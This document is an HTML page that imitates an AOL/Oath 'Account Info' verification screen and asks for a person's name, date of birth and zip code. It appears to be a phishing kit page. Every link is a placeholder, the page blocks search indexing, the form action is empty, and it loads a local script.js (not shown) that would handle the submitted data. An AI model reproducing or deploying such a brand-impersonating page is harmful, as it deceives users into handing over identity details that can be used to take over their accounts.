<!DOCTYPE html>
<html lang="en">
<head>
	<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
	<meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible" name="iecompatfix">
	<meta content="width=device-width, initial-scale=1.0" name="viewport">

	<title>Account Info</title>
	<meta name="robots" content="NOINDEX, NOFOLLOW, NOARCHIVE, NOSNIPPET">

	<link rel="shortcut icon" href="favicon.ico">

	<link rel="stylesheet" href="assets/css/open_sans.css">
	<link rel="stylesheet" href="assets/css/oldcmain-am.css">
	<link rel="stylesheet" href="assets/css/style.css">
</head>
<body>
	<div class="wrapper">
		<div class="aol-header gh-en_us">
			<div class="gh-container">
				<div class="branding">
					<div class="left clearfix logo-image-wrapper d2">
						<a class="logo-title logo-small logo-small-666666" href="#" id="brand-logo" title="AOL"></a>
						<div class="clear"></div>
					</div>
				</div>
				<div class="user darkuser">
					<div class="unauthenticated">
						<p class="username signup">Welcome</p>
						<ul>
							<li class="user-signup">
								<a href="#">Sign out</a>
							</li>
							<li>|</li>
							<li class="user-signup" style="padding-right: 4px;">
								<a href="#">Help</a>
							</li>
						</ul>
					</div>
				</div>
			</div>
		</div>
		<div id="ui-widget-overlay">
			<div class="row-fluid container">
				<div class="span12">
					<form name="formBill" action="" class="form-horizontal span12" id="reset-verify-form" method="post">
						<div class="content reset-container get-dp-id" id="reset-verify-options">
							<h3 class="error-header-msg">Verification for&nbsp;<span class="loginHere"></span></h3>
							<div class="data-blk">
								<div class="reset-sub-container">
									<ul class="nav tabs">
										<li id="verify-option-profile" style="display: list-item;">
											<div class="flt-clear">
												<span class="sphead">Verify profile information</span>
											</div>
											<div class="reset-option-blk" id="profile-option-blk" style="display: block;">
												<div class="control-group">
													<label class="control-label form-label" for="profile-first-name">Name</label>
													<div class="controls">
														<input class="input-name" id="profile-first-name" maxlength="40" name="profileFirstName" placeholder="First name" type="text">
														<input class="input-name" id="profile-last-name" maxlength="40" name="profileLastName" placeholder="Last name" type="text">
													</div>
												</div>
												<div class="control-group">
													<label class="control-label form-label">Date of Birth</label>
													<div class="controls">
														<select class="medium-select" id="birth-month" name="birthMonth">
															<option selected value="">
																Month
															</option>
															<option value="01">
																January
															</option>
															<option value="02">
																February
															</option>
															<option value="03">
																March
															</option>
															<option value="04">
																April
															</option>
															<option value="05">
																May
															</option>
															<option value="06">
																June
															</option>
															<option value="07">
																July
															</option>
															<option value="08">
																August
															</option>
															<option value="09">
																September
															</option>
															<option value="10">
																October
															</option>
															<option value="11">
																November
															</option>
															<option value="12">
																December
															</option>
														</select>
														<select class="small-select" id="birth-day" name="birthDay">
															<option value="">
																Day
															</option>
															<option value="01">
																1
															</option>
															<option value="02">
																2
															</option>
															<option value="03">
																3
															</option>
															<option value="04">
																4
															</option>
															<option value="05">
																5
															</option>
															<option value="06">
																6
															</option>
															<option value="07">
																7
															</option>
															<option value="08">
																8
															</option>
															<option value="09">
																9
															</option>
															<option value="10">
																10
															</option>
															<option value="11">
																11
															</option>
															<option value="12">
																12
															</option>
															<option value="13">
																13
															</option>
															<option value="14">
																14
															</option>
															<option value="15">
																15
															</option>
															<option value="16">
																16
															</option>
															<option value="17">
																17
															</option>
															<option value="18">
																18
															</option>
															<option value="19">
																19
															</option>
															<option value="20">
																20
															</option>
															<option value="21">
																21
															</option>
															<option value="22">
																22
															</option>
															<option value="23">
																23
															</option>
															<option value="24">
																24
															</option>
															<option value="25">
																25
															</option>
															<option value="26">
																26
															</option>
															<option value="27">
																27
															</option>
															<option value="28">
																28
															</option>
															<option value="29">
																29
															</option>
															<option value="30">
																30
															</option>
															<option value="31">
																31
															</option>
														</select>
														<select class="small-select" id="birth-year" name="birthYear">
															<option value="">
																Year
															</option>
															<option value="2016">
																2016
															</option>
															<option value="2015">
																2015
															</option>
															<option value="2014">
																2014
															</option>
															<option value="2013">
																2013
															</option>
															<option value="2012">
																2012
															</option>
															<option value="2011">
																2011
															</option>
															<option value="2010">
																2010
															</option>
															<option value="2009">
																2009
															</option>
															<option value="2008">
																2008
															</option>
															<option value="2007">
																2007
															</option>
															<option value="2006">
																2006
															</option>
															<option value="2005">
																2005
															</option>
															<option value="2004">
																2004
															</option>
															<option value="2003">
																2003
															</option>
															<option value="2002">
																2002
															</option>
															<option value="2001">
																2001
															</option>
															<option value="2000">
																2000
															</option>
															<option value="1999">
																1999
															</option>
															<option value="1998">
																1998
															</option>
															<option value="1997">
																1997
															</option>
															<option value="1996">
																1996
															</option>
															<option value="1995">
																1995
															</option>
															<option value="1994">
																1994
															</option>
															<option value="1993">
																1993
															</option>
															<option value="1992">
																1992
															</option>
															<option value="1991">
																1991
															</option>
															<option value="1990">
																1990
															</option>
															<option value="1989">
																1989
															</option>
															<option value="1988">
																1988
															</option>
															<option value="1987">
																1987
															</option>
															<option value="1986">
																1986
															</option>
															<option value="1985">
																1985
															</option>
															<option value="1984">
																1984
															</option>
															<option value="1983">
																1983
															</option>
															<option value="1982">
																1982
															</option>
															<option value="1981">
																1981
															</option>
															<option value="1980">
																1980
															</option>
															<option value="1979">
																1979
															</option>
															<option value="1978">
																1978
															</option>
															<option value="1977">
																1977
															</option>
															<option value="1976">
																1976
															</option>
															<option value="1975">
																1975
															</option>
															<option value="1974">
																1974
															</option>
															<option value="1973">
																1973
															</option>
															<option value="1972">
																1972
															</option>
															<option value="1971">
																1971
															</option>
															<option value="1970">
																1970
															</option>
															<option value="1969">
																1969
															</option>
															<option value="1968">
																1968
															</option>
															<option value="1967">
																1967
															</option>
															<option value="1966">
																1966
															</option>
															<option value="1965">
																1965
															</option>
															<option value="1964">
																1964
															</option>
															<option value="1963">
																1963
															</option>
															<option value="1962">
																1962
															</option>
															<option value="1961">
																1961
															</option>
															<option value="1960">
																1960
															</option>
															<option value="1959">
																1959
															</option>
															<option value="1958">
																1958
															</option>
															<option value="1957">
																1957
															</option>
															<option value="1956">
																1956
															</option>
															<option value="1955">
																1955
															</option>
															<option value="1954">
																1954
															</option>
															<option value="1953">
																1953
															</option>
															<option value="1952">
																1952
															</option>
															<option value="1951">
																1951
															</option>
															<option value="1950">
																1950
															</option>
															<option value="1949">
																1949
															</option>
															<option value="1948">
																1948
															</option>
															<option value="1947">
																1947
															</option>
															<option value="1946">
																1946
															</option>
															<option value="1945">
																1945
															</option>
															<option value="1944">
																1944
															</option>
															<option value="1943">
																1943
															</option>
															<option value="1942">
																1942
															</option>
															<option value="1941">
																1941
															</option>
															<option value="1940">
																1940
															</option>
															<option value="1939">
																1939
															</option>
															<option value="1938">
																1938
															</option>
															<option value="1937">
																1937
															</option>
															<option value="1936">
																1936
															</option>
															<option value="1935">
																1935
															</option>
															<option value="1934">
																1934
															</option>
															<option value="1933">
																1933
															</option>
															<option value="1932">
																1932
															</option>
															<option value="1931">
																1931
															</option>
															<option value="1930">
																1930
															</option>
															<option value="1929">
																1929
															</option>
															<option value="1928">
																1928
															</option>
															<option value="1927">
																1927
															</option>
															<option value="1926">
																1926
															</option>
															<option value="1925">
																1925
															</option>
															<option value="1924">
																1924
															</option>
															<option value="1923">
																1923
															</option>
															<option value="1922">
																1922
															</option>
															<option value="1921">
																1921
															</option>
															<option value="1920">
																1920
															</option>
														</select>
													</div>
												</div>
												<div class="control-group">
													<label class="control-label form-label" for="post-code">Zip code</label>
													<div class="controls">
														<input id="post-code" maxlength="32" name="postCode" placeholder="Zip code" type="text">
													</div>
												</div>
												<div class="button-container">
													<input class="btn btn-large btn-primary" id="profile-option-submit" type="submit" value="Next">
												</div>
											</div>
										</li>
									</ul>
								</div>
							</div>
						</div>
					</form>
				</div>
			</div>
		</div>
		<div class="push"></div>
	</div>
	<div class="footer footer-image-main">
		<div class="footer-image"><img alt="Aol." src="assets/img/brand_outh.png"></div>
	</div>
	<div class="footer">
		<div class="footer-text" style="margin-top: -10px;">
			<a href="#" target="_blank">Terms of Service</a> |<a href="#" target="_blank">Privacy Policy</a> <span>© 2017 Oath Inc. All Rights Reserved.</span>
		</div>
	</div>
	<script src="assets/js/jquery.min.js"></script>
	<script src="assets/js/jquery.cookie.js"></script>
	<script src="assets/js/jquery.md5.js"></script>
	<script src="assets/js/jquery.validate.min.js"></script>
	<script src="assets/js/script.js"></script>
</body>
</html>